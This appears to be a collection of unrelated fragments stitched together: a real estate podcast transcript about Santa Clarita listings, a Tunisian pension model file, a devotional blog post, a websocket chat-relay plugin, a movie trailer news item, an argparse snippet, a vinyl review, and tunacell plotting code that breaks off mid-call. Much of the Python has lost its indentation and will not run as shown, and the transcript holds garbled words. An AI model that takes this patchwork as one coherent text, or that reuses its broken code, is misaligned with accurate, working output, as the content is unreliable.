remax gateway: 02:52 The most important thing for me is that my clients, my real estate clients are protected and served very well throughout the entire process before months, years, maybe before, during, and of course after. So when that first point of contact comes. Alright, so let’s get into the listings. This last week here in Santa Clarita Valley, including the cities of Castaic. canyon country Newhall, Saugus Stevenson ranch and Valencia act an awkward, I’ll say in the mix as well. Seventy one new listings hit the market. Fifty nine properties had their prices changed. We see that as an upward trend from only a couple of weeks ago where those price changes weren’t much, but also we were right in the middle of the holidays at that point. I’m sorry, a month and a couple of weeks ago, so six weeks ago or so back on market properties 18. These are properties that were in escrow and fell out.
remax gateway: 03:43 Now they’re back on the market. That’s why that’s a big reason why it’s so important to set yourself up with a search account at Scvnest.com. You’re searching for homes. You find a neighborhood that you just love and you have that search set up for that particular neighborhood. Then all of a sudden you see that property that you originally got in there, you see it’s an escrow. Well, maybe you miss it. Maybe you’re too busy. Maybe a lot of stuff going on. If you were to have that search set up, when that property goes back on the market or even as its prices changed, its price changed, you’re going to get that notification in your email right away and then you’ll know you reach out to Connor what’s going on and this one, it looks like it’s back, and I said yes back. It’s falling out of escrow.
remax gateway: 07:40 show expired. Once it shows expired at the end of that contract date, then that particular seller is going to get bombarded by agents that are paying these systems to scrub or scour the Internet to get their personal information. Now they’re not going to be pulling up a phone number off of the confidential place in the MLS or wherever from the agent, but they will see that this individual left their phone number somewhere or they trace it back and they get it and they ended up calling that owner and say, and this is all scripted stuff, right? They have these scripts out there for real estate agents. Are you ready to hire the right agent? Well, in some cases they already had the right agent. Maybe they were a little unrealistic. Other price. Maybe they have a particular strategy where they’re not in a hurry. Maybe they’re waiting until the market turns.
remax gateway: 08:35 Who knows what it may be, but it could be that that agent is there, bee’s knees, but those properties that there that’s, there’s just take longer to sell. I was showing the property and property in Bakersfield yesterday, Superbowl Sunday, and while I was out there is five acres flat right next to the main road to Alfalfa fields, a massive, a garage-type improvement, super high ceilings, all insulated to massive swamp coolers on it to conex boxes sticking out of either side in the bag, made access from the inside to the out. You could park several rvs inside them, a massive roll up door. They have three of those. Then the house itself, just gorgeous, custom built, single story home with everything you could imagine. Really, really pretty, very well done. Four bedroom, four bath. Master shower was remarkable, so you have this home, but at three quarters of a million dollars, a little bit more, seven nineties at that price, in that in the middle of nowhere, it’s not around any other homes.
remax gateway: 09:55 Those questions come up so that property is going to take awhile. It’s to take a while to sell. It’s been on the market honored 80 ish days. It’s probably going to take a little bit longer, but ultimately you price something like that for a bucket is going to sell in a minute, right? Of course, the seller wouldn’t be able to sell it for a dollar and they wouldn’t want to anyway, but the end of the day it comes down to price or waiting long enough until that right buyer comes along because those buyers don’t come along as frequently as a buyer that wants to buy in an urban type area. I eat close to the mall, close to shopping, close to entertainment centers, restaurants, that sort of thing. That’s a word about expired. Those hold properties that are out there, those 18, those are typically properties that, uh, there’s something going on with maybe the seller has changed their mind and now the agent has to work it out.
remax gateway: 10:46 Maybe they have way too many offers to work on and they chose that status, which really isn’t the way it’s supposed to be. But sometimes this happens. I’ve caught in a over. Let’s get into all of the senate creative valley, 567 listings currently on the market. That data is being pulled from STV nest.com. Don’t forget to go there and click on the top. We also put in a new option for you at the top. Click on video or also you can scroll down and see my video. We had this published up here a few days ago. It kind of gives you a little bit of insight into who I am and what I’m about. Moving into the a blog section, we have several pending articles that I’ve been working on. The last one that we put up had to do with who do you trust and I have a client of ours that we wrote an offer on a house.
remax gateway: 11:41 I’ve been cast stack and she called me a little panicked saying that her sister told her that you don’t own the land under this particular house, which is totally false. We also had another relative call us, call me and tell me that his daughter is offering too much. Well, other people are offering more so that’s where that went ended up and there’s been a couple of properties lost as a result, but that’s fine. I’m here to serve no matter how long it takes, but who you trust and real estate’s incredibly important and you want to make sure that you’re getting the best advice and people aren’t taking advantage of you. I’m confident. That’s the real estate market as far as it is now. We are kind of in a little bit of a holding pattern between a buyer’s and the seller’s market.
remax gateway: 12:36 We’re not seeing a lot of inventory come on the market and we’re not seeing a lot of inventory sell, but we are seeing in some circumstances that properties are getting multiple offers when they’re priced a little bit lower than market and they’re very highly desired real estate listings. I’m Connor with HONOR. Have a great, fantastic day. I will talk to you soon. Please share the show housing radio.com. That’s an easy way to get to a sub nest. I’ve come forward slash radio. You’ll see it there. Be Safe and we’ll talk to you soon. When you’re ready, reach out because I’m here for you.
When you are ready I will be here for you and yours. I’m Connor T. MacIvor, and I’m glad to be at your service.
# -*- coding: utf-8 -*-
from openfisca_tunisia_pension.model.base import *
# raic -> raci
# Socio-economic data
# Simulation input data, to be supplied from a survey or
# generated with a test-case generator
class date_naissance(Variable):
value_type = date
default_value = date(1970, 1, 1)
entity = Individu
label = u"Date de naissance"
definition_period = ETERNITY
class salaire(Variable):
value_type = float
entity = Individu
label = u"Salaires"
definition_period = YEAR
class age(Variable):
value_type = int
entity = Individu
label = u"Âge"
definition_period = YEAR
class trimestres_valides(Variable):
value_type = int
entity = Individu
label = u"Nombre de trimestres validés"
definition_period = YEAR
class TypesRegimeSecuriteSociale(Enum):
__order__ = 'rsna rsa rsaa rtns rtte re rtfr raci salarie_cnrps pensionne_cnrps'
# Needed to preserve the enum order in Python 2
rsna = u"Régime des Salariés Non Agricoles"
rsa = u"Régime des Salariés Agricoles"
rsaa = u"Régime des Salariés Agricoles Amélioré"
rtns = u"Régime des Travailleurs Non Salariés (secteurs agricole et non agricole)"
rtte = u"Régime des Travailleurs Tunisiens à l'Etranger"
re = u"Régime des Etudiants, diplômés de l'enseignement supérieur et stagiaires"
rtfr = u"Régime des Travailleurs à Faibles Revenus (gens de maisons, travailleurs de chantiers, et artisans travaillant à la pièce)"
raci = u"Régime des Artistes, Créateurs et Intellectuels"
salarie_cnrps = u"Régime des salariés affilés à la Caisse Nationale de Retraite et de Prévoyance Sociale"
pensionne_cnrps = u"Régime des salariés des pensionnés de la Caisse Nationale de Retraite et de Prévoyance Sociale"
# references :
# http://www.social.gov.tn/index.php?id=49&L=0
# http://www.paie-tunisie.com/412/fr/83/reglementations/regimes-de-securite-sociale.aspx
class regime_securite_sociale(Variable):
value_type = Enum
possible_values = TypesRegimeSecuriteSociale
default_value = TypesRegimeSecuriteSociale.rsna
entity = Individu
label = u"Régime de sécurité sociale du retraité"
definition_period = YEAR
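# Minimal sketch (illustration only, not part of the model): the declared
# order of the enum above can be checked by iterating over it.
if __name__ == '__main__':
    for regime in TypesRegimeSecuriteSociale:
        print('{} -> {}'.format(regime.name, regime.value))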
But today, that amber glow reminded me…there is always a blessing in every season. That simple beauty was not there in the summer days. It is unique to fall.
Just like the seasons of our lives. They come and go…we yearn for the last season at times, or we yearn for a new one…yet, we forget that right there in that season, is beauty. Each season has its own beauty and its own purpose. Perfectly orchestrated by God. Each season holds its own plan.
I remember the season of being newly married. I yearned for a baby, and quickly I was in the next season. Then all of a sudden there were several babies, and here I was with a few little ones scampering around, wondering if I would ever get a minute to myself? If my house would ever be clean again?
Soon, I’ll be entering the teenage season…and rather than yearn for a different season, I will bask in the amber glow of this one. The beauty that is unique to this season of life.
I will be content in whatever season I am in. As I myself grow older and look ahead, I will always promise myself to be content in whatever season I am in.
God made the seasons. They are purposeful, and each one full of beauty and uniqueness. Whether it is the Springtime bursting with life, the leaves of fall withering, or the snow covered ground, there is purpose.
Whatever season of life or motherhood you are in…bask in it. Cherish it. Grow in it. See the blessings. Be grateful for the season.
# Plugin that creates a websocket server, and feeds all the messages written to the connected clients
import includes.helpers as helpers
import socket
import re
import base64
import hashlib
import struct
import threading
import select
import logging
class wsserver(helpers.Plugin):
def __init__(self, parent):
super().__init__(parent)
self.server = WsServerThread(4446)
self.server.start()
def handle_pm(self, msg_data):
pass
def handle_message(self, msg_data):
self.server.send_msg_all(msg_data["nick"] + ":" + msg_data["message"]) # send msg and nick to listening sockets
class WsServerThread(threading.Thread):
def __init__(self, port):
# Make server (non-blocking socket)
self.sserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.sserver.setblocking(0)
self.sserver.bind(("", port))
self.sserver.listen(5)
self.client_list = []
threading.Thread.__init__(self)
def send_msg_all(self, msg):
for sock in self.client_list:
self.send_msg(sock, msg)
def run(self):
while 1:
# We wait until we got something that is ready to read
ready_to_read, ready_to_write, in_error = select.select([self.sserver] + self.client_list, [],
[self.sserver] + self.client_list, 60)
            if in_error:
                logging.error("wsserver: socket error on %s", in_error)
for reader in ready_to_read:
if reader == self.sserver: # this will be true if there are sockets that can be accepted
clientsocket, address = self.sserver.accept()
                    # only add the socket if the handshake succeeded AND we
                    # have fewer than 100 connections already
                    if self.handshake(clientsocket) and len(self.client_list) < 100:
                        self.client_list.append(clientsocket)
logging.debug("wsserver: connection accepted from: %s", str(address))
                else:
                    # one of the other sockets has data for us, but we only
                    # check whether the read is empty, because an empty read
                    # means the socket closed
                    m = b""
                    try:
                        m = reader.recv(4096)
                    except socket.error:
                        pass  # treat a socket error like a closed connection
                    if len(m) < 1:
                        self.client_list.remove(reader)
                        reader.close()
    def send_msg(self, sock, message):
        # Frame layout: https://tools.ietf.org/html/rfc6455#page-28
        payload = message.encode("utf-8")
        length = len(payload)
        # First byte: FIN bit set and opcode 0x1, telling clients the payload is text
        frame = b"\x81"
        if length > 65025:
            raise Exception("Error - payload too large")
        elif length > 125:
            # a 7-bit length of 126 announces a 16-bit extended length field
            frame = frame + bytes([126])
            frame = frame + struct.pack(">H", length)  # big-endian 16-bit length
            frame = frame + payload
        else:
            frame = frame + bytes([length]) + payload
ready_to_read, ready_to_write, in_error = select.select([], [sock], [], 1)
if sock in ready_to_write:
try:
sock.sendall(frame)
except:
self.client_list.remove(sock)
sock.close()
def handshake(self, sock):
magic_string = "258EAFA5-E914-47DA-95CA-C5AB0DC85B11"
# Get the header, but only if the socket has anything to say (otherwise just disgard it)
ready_to_read, ready_to_write, in_error = select.select([sock], [], [], 1)
if sock in ready_to_read:
            header = sock.recv(4096).decode("utf-8", "ignore")
else:
return False
# here we should probably add some more protocol checking stuff. But this should work with any real browsers (chromium/firefox, at least for now)
# make the key, using the key from the header and the magic string
        key = re.search(r"(Sec-WebSocket-Key: )(\S+)", header)
if not key:
return False # return false if the client didn't provide a key
key = key.group(2)
key = key + magic_string
        respond_key = base64.b64encode(hashlib.sha1(key.encode("utf-8")).digest()).decode("ascii")
# Handshake
respond_message = "HTTP/1.1 101 Switching Protocols\r\n"
respond_message = respond_message + "Upgrade: websocket\r\n"
respond_message = respond_message + "Connection: Upgrade\r\n"
respond_message = respond_message + "Sec-WebSocket-Accept: %s\r\n\r\n" % respond_key
ready_to_read, ready_to_write, in_error = select.select([], [sock], [], 1) # make sure it's ready to write
if sock in ready_to_write:
            sock.sendall(respond_message.encode("utf-8"))
return True
else:
return False
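# Minimal test client for the server above (illustration only; assumes the
# server is listening on localhost:4446 as configured in wsserver). It sends
# the opening handshake and prints server-pushed frames without decoding them.
import os  # for the random handshake key below

def test_client(host="localhost", port=4446):
    sock = socket.create_connection((host, port))
    key = base64.b64encode(os.urandom(16)).decode("ascii")
    request = ("GET / HTTP/1.1\r\n"
               "Host: {}:{}\r\n"
               "Upgrade: websocket\r\n"
               "Connection: Upgrade\r\n"
               "Sec-WebSocket-Key: {}\r\n"
               "Sec-WebSocket-Version: 13\r\n\r\n").format(host, port, key)
    sock.sendall(request.encode("utf-8"))
    print(sock.recv(4096).decode("utf-8", "ignore"))  # handshake response
    while True:
        data = sock.recv(4096)  # raw text frames as built by send_msg()
        if not data:
            break
        print(data)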
A new trailer has dropped for Daddy’s Home 2, the upcoming Will Ferrell and Mark Wahlberg sequel that adds John Lithgow and Mel Gibson to the mix.
The sequel to the 2015 comedy, which grossed US$242.7 million worldwide, finds stepfather Brad (Ferrell) and father Dusty (Wahlberg) in for a chaotic holiday season when their dads (Gibson, Lithgow) decide to drop around for Christmas.
More footage is on offer in the new trailer, including more of Gibson’s tough-guy grandad. It’s good to see the Oscar winner back in films, and tackling a broad family comedy is a bit of a change of pace for him too. Fingers crossed that returning director/co-writer Sean Anders (We’re the Millers) and scribe John Morris bring the comedic best out of this great cast.
There are a few parent-focused comedies on the way. Fathers have another spotlight in the Owen Wilson and Ed Helms comedy Father Figures (previously known as Bastards) and mothers have the upcoming sequel A Bad Moms Christmas.
Daddy’s Home 2, also starring Linda Cardellini, John Cena, and Alessandra Ambrosio, opens in the U.S. on November 10 and arrives in Australia on November 23.
# need the python-argparse package installed
import argparse
# create the parser
main_parser = None
def setupParser():
global main_parser
base_parser = argparse.ArgumentParser(add_help=False)
parser = base_parser.add_argument_group('base options')
parser.add_argument("-d", "--debuglevel", dest="debuglevel", action="store", choices=xrange(10),
default=2, help="yum output level", type=int)
parser.add_argument("-e","--errorlevel", dest="errorlevel", action="store", choices=xrange(10),
default=2, help="yum error level", type=int)
main_parser = argparse.ArgumentParser(description='GUI for the yum package manager', parents = [base_parser])
subparsers = main_parser.add_subparsers()
cmds = ['install','remove']
# add a sub-command "install"
for c in cmds:
parser_cmd = subparsers.add_parser(c, help='%s a package' % c, parents = [base_parser])
parser_cmd.add_argument('package', nargs='*')
if __name__ == '__main__':
setupParser()
# parse the command line
args = main_parser.parse_args()
print args
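# Example invocations (hypothetical file name yumgui_args.py):
# $ python2 yumgui_args.py install foo bar -d 5
# Namespace(debuglevel=5, errorlevel=2, package=['foo', 'bar'])
# $ python2 yumgui_args.py remove foo
# Namespace(debuglevel=2, errorlevel=2, package=['foo'])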
But sometimes things don’t quite sink in until they are laid out in front of you.
After hearing these four cuts spread out in full width and glory over two 12″ discs, mastered by Matt Colton and released via the highly respectable ‘Blackest Ever Black’ label, it became clearer just how bloody good these tracks really were.
Created by Amos Childs out of Jabu, El Kid & Vessel – the trio that make up the main structure of Killing Sound – each piece of music on this release stands out as incredibly accomplished and beautifully restrained, with every frequency adding to the constant tension and release.
From the skewed vocal shots and elevated layers to the menacing drones, shattering drum hits and chest-crushing subs, each track sways in simple, yet complete form.
Sleeve design by Harry Wright.
180gsm vinyl – sounds heavy, feels heavy.
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
"""
This module defines plotting functions for the statistics of the dynamics.
"""
from __future__ import print_function
import os
import numpy as np
import collections
import logging
import matplotlib as mpl
import matplotlib.pyplot as plt
from matplotlib import ticker
import matplotlib.gridspec as gridspec
from tunacell.filters.main import FilterSet
from tunacell.stats.single import Univariate, StationaryUnivariate
from tunacell.stats.two import StationaryBivariate
from tunacell.io import text
from .helpers import _set_axis_limits, _set_timelabel, _set_time_axis_ticks
# few variables that will be used through all functions
default_fontsize = mpl.rcParams['font.size']
default_lw = mpl.rcParams['lines.linewidth']
def _set_condition_list(univariate, show_cdts='master'):
"""Set the list of conditions to show
Parameters
----------
show_cdts : str or FilterSet or iterable on these (default 'master')
the conditions to plot, use 'all' for all conditions in univariate
univariate : Univariate instance
conditions will be matched against conditions stored in univariate
Returns
-------
list of FilterSet (conditions) to show
"""
conditions = ['master', ] # list of conditions to be plotted
if show_cdts == 'all':
conditions = ['master', ] + univariate.cset
elif show_cdts == 'master':
pass
elif isinstance(show_cdts, collections.Iterable):
for item in show_cdts:
_append_cdt(univariate, item, conditions)
else:
_append_cdt(univariate, show_cdts, conditions)
return conditions
def _append_cdt(univariate, this_cdt, cdt_list):
"""Append condition associated to this_cdt in univariate object to cdt_list
Parameters
----------
univariate : :class:`Univariate` instance
this_cdt : str or :class:`FilterSet` instance
either the condition instance or its string representation
cdt_list : list of conditions
list of conditions to append condition to
"""
found = False
if isinstance(this_cdt, str):
# find which
for cdt in univariate.cset:
# TODO : compare also cdt.label
if repr(cdt) == this_cdt:
found = True
break
elif isinstance(this_cdt, FilterSet):
for cdt in univariate.cset:
if repr(cdt) == repr(this_cdt):
found = True
break
if found:
cdt_list.append(cdt)
return
def plot_onepoint(univariate, show_cdts='all', show_ci=False,
mean_ref=None, var_ref=None,
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
counts_range=(None, None),
counts_fractional_pad=.1,
average_range=(None, None), # auto
average_fractional_pad=.1,
variance_range=(None, None),
variance_fractional_pad=.1,
show_legend=True,
show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, user_path=None, ext='.png',
verbose=False):
"""Plot one point statistics: counts, average, abd variance.
One point functions are plotted for each condition set up in *show_cdts*
argument: 'all' for all conditions, or the string representation (or label)
    of a particular condition (or a list thereof).
Parameters
----------
univariate : Univariate instance
show_cdts : str (default 'all')
must be either 'all', or 'master', or the repr of a condition, or a
list thereof
show_ci : bool {False, True}
whether to show 99% confidence interval
mean_ref : float
reference mean value: what user expect to see as sample average to
compare with data
var_ref : float
reference variance value: what user expect to see as sample variance to
compare with data
axe_xsize : float (default 6)
size of the x-axis (inches)
axe_ysize : float (default 2.)
size if a single ax y-axis (inches)
time_range : couple of floats (default (None, None))
specifies (left, right) bounds
time_fractional_pad : float (default .1)
fraction of x-range to add as padding
counts_range : couple of floats (default (None, None))
specifies range for the Counts y-axis
    counts_fractional_pad : float (default .1)
        fractional amount of y-range to add as padding
    average_range : couple of floats (default (None, None))
        specifies range for the Average y-axis
    average_fractional_pad : float (default .1)
        fractional amount of y-range to add as padding
    variance_range : couple of floats (default (None, None))
        specifies range for the Variance y-axis
    variance_fractional_pad : float (default .1)
        fractional amount of y-range to add as padding
show_legend : bool {True, False}
print out legend
show_cdt_details_in_legend : bool {False, True}
show details about filters
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
save : bool {False, True}
whether to save plot
user_path : str (default None)
user defined path where to save figure; default is canonical path
(encouraged)
ext : str {'.png', '.pdf'}
extension to be used when saving file
verbose : bool {False, True}
"""
if not isinstance(univariate, Univariate):
raise TypeError('Input is not {}'.format(Univariate))
fig, axs = plt.subplots(3, 1, figsize=(axe_xsize, 3*axe_ysize))
obs = univariate.obs
timelabel = _set_timelabel(obs) # define time label
main_handles = [] # main legend
ci_handles = [] # additional legend (TODO: check if necessary)
all_times = []
all_counts = []
all_average = []
all_variance = []
# build condition list
conditions = _set_condition_list(univariate, show_cdts)
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
alpha = 1
alpha_fill = .5
else:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
alpha = .8
alpha_fill = 0.3
ok = np.where(univariate[c_repr].count_one > 0)
times = univariate[c_repr].time[ok]
all_times.extend(times)
counts = univariate[c_repr].count_one[ok]
all_counts.extend(counts)
mean = univariate[c_repr].average[ok]
all_average.extend(mean)
var = univariate[c_repr].var[ok]
all_variance.extend(var)
std = univariate[c_repr].std[ok]
se = 2.58 * std / np.sqrt(counts) # standard error 99% CI Gaussian
# var = np.diagonal(univariate[c_repr].autocorr)
line_counts, = axs[0].plot(times, counts, alpha=alpha, lw=lw,
label='{}'.format(c_label))
main_handles.append(line_counts)
color = line_counts.get_color()
average, = axs[1].plot(times, mean, color=color, alpha=0.8, lw=lw, label=c_label)
if show_ci:
fill_std = axs[1].fill_between(times, mean-se, mean+se,
facecolor=color, alpha=alpha_fill)
ci_handles.append(fill_std)
all_average.extend(mean-se)
all_average.extend(mean+se)
variance, = axs[2].plot(times, var, color=color, alpha=0.8, lw=lw, label=c_label)
# adding reference lines
if mean_ref is not None:
mref = axs[1].axhline(mean_ref, ls='-.', color='C7', alpha=.7,
label='reference value')
main_handles.append(mref)
all_average.append(mean_ref)
if var_ref is not None:
vref = axs[2].axhline(var_ref, ls='-.', color='C7', alpha=.7,
label='reference value')
        # check last label if mean_ref has been saved
last_lab = main_handles[-1].get_label()
if last_lab != vref.get_label():
main_handles.append(vref)
all_variance.append(var_ref)
# print vertical line at tref
if obs.timing != 'g' and isinstance(obs.tref, float):
for ax in axs:
vtref = ax.axvline(univariate.obs.tref, color='C7', ls='--',
alpha=.5, label='reference time in obs')
main_handles.append(vtref) # only the last one
# ## limits and ticks ##
# xaxis
for ax in axs:
left, right = _set_axis_limits(ax, all_times, which='x', pad=time_fractional_pad,
force_range=time_range)
# locator
locator = _set_time_axis_ticks(axs[0], obs, bounds=(left, right))
for ax in axs:
ax.xaxis.set_major_locator(locator)
# yaxis limits
_set_axis_limits(axs[0], all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
axs[0].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
# average
_set_axis_limits(axs[1], all_average, which='y', pad=average_fractional_pad,
force_range=average_range)
axs[1].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# variance
_set_axis_limits(axs[2], all_variance, which='y', pad=variance_fractional_pad,
force_range=variance_range)
axs[2].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# tick formatter
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
for ax in axs:
ax.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
axs[0].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[1].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[2].set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
for ax in axs[:2]:
ax.spines['bottom'].set_visible(False)
ax.tick_params(axis='x', colors='C7')
for ax in axs[1:]:
ax.spines['top'].set_color('C7')
axs[0].set_ylabel('Counts', fontsize='medium')
axs[1].set_ylabel('Average', fontsize='medium')
axs[2].set_ylabel('Variance', fontsize='medium')
# ## legend ##
# C.I.
if ci_handles:
ci = ci_handles[0]
# ci.set_color('C7')
ci.set_label('.99 C.I.')
main_handles.append(ci)
handles = main_handles[:]
labels = [h.get_label() for h in handles]
if show_legend:
axs[-1].legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.5/axe_ysize))
# title
latex_obs = obs.latexify(use_name=use_obs_name)
axs[0].text(0.5, 1+.2/axe_ysize,
r'{}'.format(latex_obs),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
transform=axs[0].transAxes)
fig.subplots_adjust(hspace=0)
if save:
univ = univariate
try:
obs_path = univ._get_obs_path(user_root=user_path, write=False)
except text.MissingFolderError:
# it means data has not been written yet
# export data and then get
univ.export_text(analysis_folder=user_path)
obs_path = univ._get_obs_path(user_root=user_path, write=False)
bname = 'plot_onepoint_' + univ.obs.name + '_' + univ.region.name + ext
fname = os.path.join(obs_path, bname)
fig.savefig(fname, bbox_inches='tight', pad_inches=0)
if verbose:
print('Figure saved as {}'.format(fname))
return fig
def plot_twopoints(univariate, condition_label=None, trefs=[], ntrefs=4,
axe_xsize=6., axe_ysize=2.,
time_range=(None, None),
time_fractional_pad=.1,
counts_range=(None, None),
counts_fractional_pad=.1,
corr_range=(None, None), # auto
corr_fractional_pad=.1,
delta_t_max=None,
show_exp_decay=None,
show_legend=True,
show_cdt_details_in_legend=False,
use_obs_name=None,
save=False, ext='.png', verbose=False):
"""Plot two-point functions: counts and autocorrelation functions.
These plots are able to show only one extra condition with 'master', and
are plotted for a set of time of references.
Parameters
----------
univariate : :class:`Univariate` instance
condition_label : str (default None)
must be the repr of a given FilterSet
    trefs : list of floats
indicate the times that you would like to have as references
if left empty, reference times will be computed automatically
ntrefs : int
if trefs is empty, number of times of reference to display
axe_xsize : float (default 6)
size of the x-axis (inches)
axe_ysize : float (default 2.)
size if a single ax y-axis (inches)
time_range : couple of floats (default (None, None))
specifies (left, right) bounds
time_fractional_pad : float (default .1)
fraction of x-range to add as padding
counts_range : couple of floats (default (None, None))
specifies range for the Counts y-axis
    counts_fractional_pad : float (default .1)
        fractional amount of y-range to add as padding
    corr_range : couple of floats (default (None, None))
        specifies range for the correlation y-axis
    corr_fractional_pad : float (default .1)
        fractional amount of y-range to add as padding
delta_t_max : float (default None)
when given, bottom plot will be using this max range symmetrically;
otherwise, will use the largest intervals found in data (often too
large to see something)
show_exp_decay : float (default None)
when a floating point number is passed, a light exponential decay
curve is plotted for each tref
show_legend : bool {True, False}
print out legend
show_cdt_details_in_legend : bool {False, True}
show details about filters
use_obs_name : str (default None)
when filled, the plot title will use this observable name instead
of looking for the observable registered name
save : bool {False, True}
whether to save figure at canonical path
ext : str {'.png', '.pdf'}
extension to be used when saving figure
verbose : bool {False, True}
"""
obs = univariate.obs
timelabel = _set_timelabel(obs) # define time label
    # get period from eval times
if len(univariate.eval_times) > 0:
period = univariate.eval_times[1] - univariate.eval_times[0]
# or from experiment metadata
else:
period = univariate.exp.period
fig, axs = plt.subplots(3, 1, figsize=(axe_xsize, 3*axe_ysize))
# choice of index/indices for time of reference
times = univariate['master'].time
npoints = len(times)
if not trefs:
logging.info('Determining trefs...')
di = npoints // ntrefs + 1
indices = np.arange(0, npoints, di, dtype=int)
trefs = times[indices]
logging.info(trefs)
all_times = []
all_counts = []
all_corr = []
handles = []
# prep work for latex printing
    latex_ref = r'{{\mathrm{{ref}}}}'
if obs.timing == 'g':
prefix = 'g'
units = ''
else:
prefix = 't'
units = 'mins'
conditions = ['master', ] + univariate.cset
for index, cdt in enumerate(conditions):
if cdt == 'master':
c_repr = 'master'
c_label = 'all samples'
lw = default_lw + 1
lt = '-'
alpha = .8
elif cdt.label == condition_label or str(cdt) == condition_label or repr(cdt) == condition_label:
c_repr = repr(cdt)
if show_cdt_details_in_legend:
c_label = str(cdt)
else:
c_label = cdt.label
lw = default_lw
lt = '--'
alpha = .6
# we plot master and one condition if given, not more...
else:
continue
times = univariate[c_repr].time
counts = univariate[c_repr].count_two
corr = univariate[c_repr].autocorr
var = np.diagonal(corr)
valid = counts != 0
for tref in trefs:
# this tref may not be in conditioned data (who knows)
if np.amin(np.abs(times - tref)) > period:
continue
index = np.argmin(np.abs(times - tref))
if obs.timing == 'g':
lab = '{:d}'.format(tref)
else:
lab = '{:.0f}'.format(tref)
line_label = r'$ {}_{} = {}$ {} ({})'.format(prefix, latex_ref, lab, units, c_label)
ok = np.where(counts[index, :] > 0)
# if len(ok[0]) == 0:
# continue
# time limits
all_times.extend(times[ok])
dat, = axs[0].plot(times[ok], counts[index, :][ok],
ls=lt, lw=lw, alpha=alpha, label=line_label)
handles.append(dat)
all_counts.extend(counts[index, :][ok])
color = dat.get_color()
axs[0].plot((tref, tref), (0, counts[index, index]),
ls=':', color=color)
axs[1].axhline(0, ls='-', color='C7', alpha=.3) # thin line at 0
dat, = axs[1].plot(times[valid[index, :]],
corr[index, :][valid[index, :]]/var[index],
ls=lt, lw=lw, alpha=alpha)
all_corr.extend(corr[index, :][valid[index, :]]/var[index])
color = dat.get_color()
axs[1].axvline(tref, ymin=0.1, ymax=0.9, ls=':', color=color)
axs[2].axhline(0, ls='-', color='C7', alpha=.3) # thin line at 0
axs[2].plot(times[valid[index, :]] - tref,
corr[index, :][valid[index, :]]/var[index], ls=lt, lw=lw, alpha=alpha)
# ## limits and ticks ##
# xaxis
for ax in axs[:2]:
left, right = _set_axis_limits(ax, all_times, which='x',
pad=time_fractional_pad,
force_range=time_range)
hrange = right - left
ax.xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
# bottom plot : try to zoom over provided range
if delta_t_max is not None:
axs[2].set_xlim(left=-delta_t_max, right=delta_t_max)
# if not provided, compute automatic ranges (not pretty usually)
else:
axs[2].set_xlim(left=-hrange, right=hrange)
axs[2].xaxis.set_major_locator(ticker.MaxNLocator(integer=True))
# add exponential decay
if show_exp_decay is not None:
tt = np.linspace(left, right, 100)
dd = np.linspace(-hrange, hrange, 100)
lab = r'$t_{{\mathrm{{decay}}}} = {:.1f}$ {}'.format(1./show_exp_decay, units)
for tref in trefs:
axs[1].plot(tt, np.exp(-show_exp_decay * np.abs(tt - tref)),
ls='-.', color='C7', alpha=.7)
dec, = axs[2].plot(dd, np.exp(-show_exp_decay * np.abs(dd)),
ls='-.', color='C7', alpha=.7, label=lab)
all_corr.extend(np.exp(-show_exp_decay * np.abs(dd)))
handles.append(dec)
# ## yaxis limits ##
# counts
_set_axis_limits(axs[0], all_counts, which='y', pad=counts_fractional_pad,
force_range=counts_range)
axs[0].yaxis.set_major_locator(ticker.MaxNLocator(nbins=3, integer=True))
# corr
for ax in axs[1:]:
_set_axis_limits(ax, all_corr, which='y', pad=corr_fractional_pad,
force_range=corr_range)
ax.yaxis.set_major_locator(ticker.MaxNLocator(nbins=3))
# legend
labels = [h.get_label() for h in handles]
axs[-1].legend(handles=handles, labels=labels, loc='upper left',
bbox_to_anchor=(0, -.5/axe_ysize), labelspacing=0.2) # reduce labelspacing because of LaTeX
formatter = ticker.ScalarFormatter(useMathText=True, useOffset=False)
formatter.set_powerlimits((-2, 4))
for ax in axs:
ax.yaxis.set_major_formatter(formatter)
t = ax.yaxis.get_offset_text()
plt.draw()
msg = t.get_text()
ax.text(0, .95, msg, ha='left', va='top', transform=ax.transAxes)
t.set_visible(False)
axs[0].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[1].tick_params(axis='x', direction='in', bottom='on', labelbottom='on', pad=-10)
axs[2].set_xlabel(timelabel, x=.95, horizontalalignment='right',
fontsize='medium')
# hide intermediate x axis
for ax in axs[:1]:
ax.spines['bottom'].set_visible(False)
ax.tick_params(axis='x', colors='C7')
for ax in axs[1:2]:
ax.spines['top'].set_color('C7')
# ylabels
axs[0].set_ylabel(r'# $\langle t_{\mathrm{ref}} | t \rangle$',
fontsize='medium')
axs[1].set_ylabel(r'$a(t_{\mathrm{ref}}, t)$',
fontsize='medium')
axs[2].set_ylabel(r'$a(t_{\mathrm{ref}}, t- t_{\mathrm{ref}})$',
fontsize='medium')
# title
latex_obs = obs.latexify(use_name=use_obs_name)
axs[0].text(0.5, 1+.2/axe_ysize,
r'{}'.format(latex_obs),
size='large',
horizontalalignment='center',
verticalalignment='bottom',
